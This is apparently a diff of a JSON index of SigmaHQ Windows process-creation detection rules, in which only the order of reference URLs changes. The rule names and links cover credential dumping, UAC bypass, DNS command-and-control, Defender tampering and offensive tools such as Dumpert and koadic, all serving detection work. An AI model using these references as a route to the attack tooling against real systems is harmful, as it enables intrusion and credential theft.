@@ -52050,8 +52050,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/", "https://twitter.com/bohops/status/948061991012327424", + "https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cl_invocation.yml" ], "tags": [ @@ -52300,9 +52300,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/_JohnHammond/status/1531672601067675648", "https://twitter.com/nao_sec/status/1530196847679401984", "https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/", + "https://twitter.com/_JohnHammond/status/1531672601067675648", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdt.yml" ], "tags": [ @@ -52401,11 +52401,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289/3", + "https://twitter.com/GadixCRK/status/1369313704869834753?s=20", "https://twitter.com/BleepinComputer/status/1372218235949617161", + "https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289/3", "https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/", "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", - "https://twitter.com/GadixCRK/status/1369313704869834753?s=20", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_hafnium.yml" ], "tags": [ 
@@ -52439,9 +52439,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md#atomic-test-7---create-a-process-using-wmi-query-and-an-encoded-command", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware", "https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md#atomic-test-7---create-a-process-using-wmi-query-and-an-encoded-command", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_unc2452_ps.yml" ], "tags": [ @@ -52606,10 +52606,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows/compatibility/ntvdm-and-16-bit-app-support", "https://app.any.run/tasks/93fe92fa-8b2b-4d92-8c09-a841aed2e793/", - "https://support.microsoft.com/fr-fr/topic/an-ms-dos-based-program-that-uses-the-ms-dos-protected-mode-interface-crashes-on-a-computer-that-is-running-windows-7-5dc739ea-987b-b458-15e4-d28d5cca63c7", + "https://docs.microsoft.com/en-us/windows/compatibility/ntvdm-and-16-bit-app-support", "https://app.any.run/tasks/214094a7-0abc-4a7b-a564-1b757faed79d/", + "https://support.microsoft.com/fr-fr/topic/an-ms-dos-based-program-that-uses-the-ms-dos-protected-mode-interface-crashes-on-a-computer-that-is-running-windows-7-5dc739ea-987b-b458-15e4-d28d5cca63c7", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_16bit_application.yml" ], "tags": [ 
@@ -52860,8 +52860,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/", "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/", + "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_appx_execution.yml" ], "tags": [ @@ -52997,8 +52997,8 @@ "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1562.001/T1562.001.md", - "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md", "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_reg_add.yml" ], "tags": [ @@ -53023,8 +53023,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://h.43z.one/ipconverter/", "https://twitter.com/Yasser_Elsnbary/status/1553804135354564608", + "https://h.43z.one/ipconverter/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_obfuscated_ip_via_cli.yml" ], "tags": [ 
@@ -53082,8 +53082,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://redcanary.com/blog/intelligence-insights-april-2022/", "https://www.echotrail.io/insights/search/regsvr32.exe", + "https://redcanary.com/blog/intelligence-insights-april-2022/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_spawn_explorer.yml" ], "tags": [ @@ -53116,8 +53116,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/OTRF/detection-hackathon-apt29/issues/6", "https://threathunterplaybook.com/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.html", + "https://github.com/OTRF/detection-hackathon-apt29/issues/6", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_high_integrity_sdclt.yml" ], "tags": [ @@ -53151,9 +53151,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://ragged-lab.blogspot.com/2020/06/it-is-always-dns-powershell-edition.html", - "https://blu3-team.blogspot.com/2019/08/powershell-dns-c2-notes.html", "https://github.com/lukebaggett/dnscat2-powershell", + "https://blu3-team.blogspot.com/2019/08/powershell-dns-c2-notes.html", + "https://ragged-lab.blogspot.com/2020/06/it-is-always-dns-powershell-edition.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dnscat2_powershell_implementation.yml" ], "tags": [ 
@@ -53251,9 +53251,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.hybrid-analysis.com/sample/4be06ecd234e2110bd615649fe4a6fa95403979acf889d7e45a78985eb50acf9?environmentId=1", "https://blog.malwarebytes.com/threat-analysis/2016/04/rokku-ransomware/", "https://digital-forensics.sans.org/blog/2010/06/04/wmic-draft/", + "https://www.hybrid-analysis.com/sample/4be06ecd234e2110bd615649fe4a6fa95403979acf889d7e45a78985eb50acf9?environmentId=1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wmic_execution.yml" ], "tags": [ @@ -53287,8 +53287,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "Internal Research", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks", + "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_change.yml" ], "tags": [ @@ -53391,8 +53391,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.hybrid-analysis.com/sample/8da5b75b6380a41eee3a399c43dfe0d99eeefaa1fd21027a07b1ecaa4cd96fdd?environmentId=120", "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html", + "https://www.hybrid-analysis.com/sample/8da5b75b6380a41eee3a399c43dfe0d99eeefaa1fd21027a07b1ecaa4cd96fdd?environmentId=120", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_copy_system32.yml" ], "tags": [ 
@@ -53601,8 +53601,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/attrib", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md#atomic-test-3---create-windows-system-file-with-attrib", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/attrib", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_attrib_system.yml" ], "tags": [ @@ -53775,8 +53775,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://eqllib.readthedocs.io/en/latest/analytics/ab7a6ef4-0983-4275-a4f1-5c6bd3c31c23.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1123/T1123.md", + "https://eqllib.readthedocs.io/en/latest/analytics/ab7a6ef4-0983-4275-a4f1-5c6bd3c31c23.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_audio_capture.yml" ], "tags": [ @@ -53800,10 +53800,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.rapid7.com/blog/post/2022/01/18/active-exploitation-of-vmware-horizon-servers/", - "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", "https://www.sprocketsecurity.com/resources/crossing-the-log4j-horizon-a-vulnerability-with-no-return", "https://nodejs.org/api/cli.html", + "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://www.rapid7.com/blog/post/2022/01/18/active-exploitation-of-vmware-horizon-servers/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_node_abuse.yml" ], "tags": [ 
@@ -53871,8 +53871,8 @@ "logsource.product": "windows", "refs": [ "https://mattharr0ey.medium.com/privilege-escalation-uac-bypass-in-changepk-c40b92818d1b", - "https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf", "https://github.com/hfiref0x/UACME", + "https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_changepk_slui.yml" ], "tags": [ @@ -53906,8 +53906,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.hybrid-analysis.com/sample/2a4ae284c76f868fc51d3bb65da8caa6efacb707f265b25c30f34250b76b7507?environmentId=100", "https://www.google.com/url?hl=en&q=https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about&source=gmail&ust=1511481120837000&usg=AFQjCNGdL7gVwLXaNSl2Td8ylDYbSJFmPw", + "https://www.hybrid-analysis.com/sample/2a4ae284c76f868fc51d3bb65da8caa6efacb707f265b25c30f34250b76b7507?environmentId=100", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2017_11882.yml" ], "tags": [ @@ -54040,10 +54040,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://adsecurity.org/?p=2604", "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.1", - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.1", "https://thedfirreport.com/2021/11/01/from-zero-to-domain-admin/", + "https://adsecurity.org/?p=2604", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_set_policies_to_unsecure_level.yml" ], "tags": [ 
@@ -54076,9 +54076,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://twitter.com/0gtweet/status/1602644163824156672?s=20&t=kuxbUnZPltpvFPZdCrqPXA", "https://twitter.com/pabraeken/status/990717080805789697", "https://lolbas-project.github.io/lolbas/Binaries/Runonce/", - "https://twitter.com/0gtweet/status/1602644163824156672?s=20&t=kuxbUnZPltpvFPZdCrqPXA", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_runonce_execution.yml" ], "tags": [ @@ -54195,11 +54195,11 @@ "logsource.product": "windows", "refs": [ "https://twitter.com/Wietze/status/1542107456507203586", - "https://twitter.com/pythonresponder/status/1385064506049630211?s=21", + "https://twitter.com/shantanukhande/status/1229348874298388484", "https://twitter.com/Hexacorn/status/1224848930795552769", + "https://twitter.com/pythonresponder/status/1385064506049630211?s=21", "https://twitter.com/SBousseaden/status/1167417096374050817", "https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/", - "https://twitter.com/shantanukhande/status/1229348874298388484", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_process_dump_rundll32_comsvcs.yml" ], "tags": [ 
@@ -54235,16 +54235,16 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables", - "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code", - "https://bunnyinside.com/?term=f71e8cb9c76a", - "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39", - "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_", "https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38", - "http://managed670.rssing.com/chan-5590147/all_p1.html", - "https://twitter.com/_xpn_/status/1268712093928378368", - "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr", "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf", + "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39", + "https://twitter.com/_xpn_/status/1268712093928378368", + "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code", + "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr", + "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_", + "http://managed670.rssing.com/chan-5590147/all_p1.html", + 
"https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables", + "https://bunnyinside.com/?term=f71e8cb9c76a", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_etw_modification_cmdline.yml" ], "tags": [ @@ -54432,8 +54432,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", "https://www.d7xtech.com/free-software/runx/", + "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tool_runx_as_system.yml" ], "tags": [ @@ -54467,9 +54467,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://docs.microsoft.com/en-us/visualstudio/debugger/debug-using-the-just-in-time-debugger?view=vs-2019", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Vsjitdebugger/", "https://twitter.com/pabraeken/status/990758590020452353", - "https://docs.microsoft.com/en-us/visualstudio/debugger/debug-using-the-just-in-time-debugger?view=vs-2019", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_vsjitdebugger_bin.yml" ], "tags": [ @@ -54502,9 +54502,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://blog.f-secure.com/hunting-for-koadic-a-com-based-rootkit/", "https://unit42.paloaltonetworks.com/unit42-sofacy-groups-parallel-attacks/", "https://github.com/offsecginger/koadic/blob/457f9a3ff394c989cdb4c599ab90eb34fb2c762c/data/stager/js/stdlib.js", - "https://blog.f-secure.com/hunting-for-koadic-a-com-based-rootkit/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_koadic.yml" ], "tags": [ 
@@ -54620,8 +54620,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1071.001/T1071.001.md#atomic-test-2---malicious-user-agents---cmd", "https://curl.se/docs/manpage.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1071.001/T1071.001.md#atomic-test-2---malicious-user-agents---cmd", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_curl_useragent.yml" ], "tags": [ @@ -54710,8 +54710,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/", "https://github.com/Azure/Azure-Sentinel/blob/43e9be273dca321295190bfc4902858e009d4a35/Detections/MultipleDataSources/SOURGUM_IOC.yaml", + "https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/", "https://www.virustotal.com/gui/file/c299063e3eae8ddc15839767e83b9808fd43418dc5a1af7e4f44b97ba53fbd3d/detection", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_sourgrum.yml" ], 
@@ -54788,10 +54788,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://twitter.com/vysecurity/status/873181705024266241", + "https://lolbas-project.github.io/lolbas/Binaries/Rpcping/", "https://twitter.com/vysecurity/status/974806438316072960", "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh875578(v=ws.11)", - "https://lolbas-project.github.io/lolbas/Binaries/Rpcping/", - "https://twitter.com/vysecurity/status/873181705024266241", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rpcping.yml" ], "tags": [ @@ -54859,8 +54859,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1216/T1216.md", + "https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml" ], "tags": [ @@ -54901,9 +54901,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/", "https://blog.sekoia.io/lucky-mouse-incident-response-to-detection-engineering/", "https://github.com/jpillora/chisel/", - "https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_chisel_usage.yml" ], "tags": [ 
@@ -54993,8 +54993,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/pabraeken/status/993497996179492864", "https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml", + "https://twitter.com/pabraeken/status/993497996179492864", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_vboxdrvinst.yml" ], "tags": [ @@ -55094,9 +55094,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://rvsec0n.wordpress.com/2020/01/24/malwares-that-bypass-windows-defender/", - "https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_disable_defender_av_security_monitoring.yml" ], "tags": [ @@ -55187,8 +55187,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/outflanknl/Dumpert", "https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/", + "https://github.com/outflanknl/Dumpert", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_dumpert.yml" ], "tags": [ 
@@ -55346,8 +55346,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://pentestlab.blog/2020/02/10/credential-access-password-filter-dll/", "https://github.com/3gstudent/PasswordFilter/tree/master/PasswordFilter", + "https://pentestlab.blog/2020/02/10/credential-access-password-filter-dll/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_credential_access_via_password_filter.yml" ], "tags": [ @@ -55489,8 +55489,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/clip", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1115/T1115.md", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/clip", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_clip.yml" ], "tags": [ @@ -55581,9 +55581,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell", "https://docs.microsoft.com/en-us/powershell/module/bitstransfer/add-bitsfile?view=windowsserver2019-ps", "https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/", + "https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_web_request_cmd_and_cmdlets.yml" ], "tags": [ 
@@ -55650,9 +55650,9 @@ "logsource.product": "windows", "refs": [ "https://app.any.run/tasks/e13ab713-64cf-4b23-ad93-6dceaa5429ac/", - "https://app.any.run/tasks/84fc9b4a-ea2b-47b1-8aa6-9014402dfb56/", "https://app.any.run/tasks/81f3c28c-c686-425d-8a2b-a98198d244e1/", "https://app.any.run/tasks/97f875e8-0e08-4328-815f-055e971ba754/", + "https://app.any.run/tasks/84fc9b4a-ea2b-47b1-8aa6-9014402dfb56/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_emotet.yml" ], "tags": [ @@ -55825,9 +55825,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.intrinsec.com/apt27-analysis/", "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/", "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", + "https://www.intrinsec.com/apt27-analysis/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_snapins_hafnium.yml" ], "tags": [ @@ -55973,8 +55973,8 @@ "logsource.product": "windows", "refs": [ "https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5", - "https://lolbas-project.github.io/lolbas/Binaries/Verclsid/", "https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/", + "https://lolbas-project.github.io/lolbas/Binaries/Verclsid/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_verclsid_runs_com.yml" ], "tags": [ 
@@ -56007,8 +56007,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://ss64.com/nt/mklink.html", "https://github.com/redcanaryco/atomic-red-team/blob/5c1e6f1b4fafd01c8d1ece85f510160fc1275fbf/atomics/T1546.008/T1546.008.md", + "https://ss64.com/nt/mklink.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_create_link_osk_cmd.yml" ], "tags": [ @@ -56032,8 +56032,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.hybrid-analysis.com/sample/3a1f01206684410dbe8f1900bbeaaa543adfcd07368ba646b499fa5274b9edf6?environmentId=100", "https://www.hybrid-analysis.com/sample/f16c729aad5c74f19784a24257236a8bbe27f7cdc4a89806031ec7f1bebbd475?environmentId=100", + "https://www.hybrid-analysis.com/sample/3a1f01206684410dbe8f1900bbeaaa543adfcd07368ba646b499fa5274b9edf6?environmentId=100", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cmd_http_appdata.yml" ], "tags": [ @@ -56150,9 +56150,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html", "https://www.joesandbox.com/analysis/411752/0/html#7048BB9A06B8F2DD9D24C77F389D7B2B58D2", "https://app.any.run/tasks/8b9a571b-bcc1-4783-ba32-df4ba623b9c0/", + "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mal_darkside_ransomware.yml" ], "tags": [ 
@@ -56296,8 +56296,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf", "https://attack.mitre.org/software/S0246/ (Lazarus HARDRAIN)", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_add.yml" ], "tags": [ @@ -56330,8 +56330,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.011/T1218.011.md", "https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.011/T1218.011.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_script_run.yml" ], "tags": [ @@ -56422,10 +56422,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/", "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", - "https://github.com/antonioCoco/RogueWinRM", "https://twitter.com/Cyb3rWard0g/status/1453123054243024897", + "https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/", + "https://github.com/antonioCoco/RogueWinRM", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_child_process_as_system_.yml" ], "tags": [ 
@@ -56459,9 +56459,9 @@ "logsource.product": "windows", "refs": [ "https://blog.truesec.com/2021/07/04/kaseya-supply-chain-attack-targeting-msps-to-deliver-revil-ransomware/", - "https://community.sophos.com/b/security-blog/posts/active-ransomware-attack-on-kaseya-customers", - "https://therecord.media/revil-ransomware-executes-supply-chain-attack-via-malicious-kaseya-update/", "https://doublepulsar.com/kaseya-supply-chain-attack-delivers-mass-ransomware-event-to-us-companies-76e4ec6ec64b", + "https://therecord.media/revil-ransomware-executes-supply-chain-attack-via-malicious-kaseya-update/", + "https://community.sophos.com/b/security-blog/posts/active-ransomware-attack-on-kaseya-customers", "https://www.joesandbox.com/analysis/443736/0/html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_revil_kaseya.yml" ], @@ -56496,8 +56496,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://h.43z.one/ipconverter/", "https://twitter.com/Yasser_Elsnbary/status/1553804135354564608", + "https://h.43z.one/ipconverter/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_obfuscated_ip_download.yml" ], "tags": [ @@ -56520,9 +56520,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", - "https://redcanary.com/threat-detection-report/", "https://www.cobaltstrike.com/help-windows-executable", + "https://redcanary.com/threat-detection-report/", + "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cobaltstrike_load_by_rundll32.yml" ], "tags": [ 
